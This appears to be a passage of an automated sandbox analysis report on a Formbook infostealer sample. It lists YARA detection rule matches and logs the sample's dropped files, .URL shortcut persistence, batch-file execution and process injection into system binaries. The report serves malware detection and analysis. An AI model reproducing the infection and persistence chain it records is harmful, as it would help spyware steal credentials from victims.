        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.218936483.000000000238C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.218936483.000000000238C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219090814.00000000023D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219090814.00000000023D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219039439.00000000023BC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219039439.00000000023BC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219132756.0000000002404000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219132756.0000000002404000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 00000013.00000003.326571745.0000000004B64000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000013.00000003.326571745.0000000004B64000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000015.00000003.340471600.000000000447C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000015.00000003.340471600.000000000447C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.219141358.00000000023EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.219141358.00000000023EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\user\AppData\Local\Mqbm.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/9@5/5
        Source: C:\Windows\SysWOW64\notepad.exeCode function: 2_2_5048784E GetDiskFreeSpaceA,2_2_5048784E
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile created: C:\Users\user\AppData\Local\Mqbmnet.exeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Mqbmupv_Signed_.exeVirustotal: Detection: 27%
        Source: Mqbmupv_Signed_.exeReversingLabs: Detection: 45%
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeFile read: C:\Users\user\Desktop\Mqbmupv_Signed_.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Mqbmupv_Signed_.exe 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: unknownProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exeJump to behavior
        Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
        Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.batJump to behavior
        Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.batJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'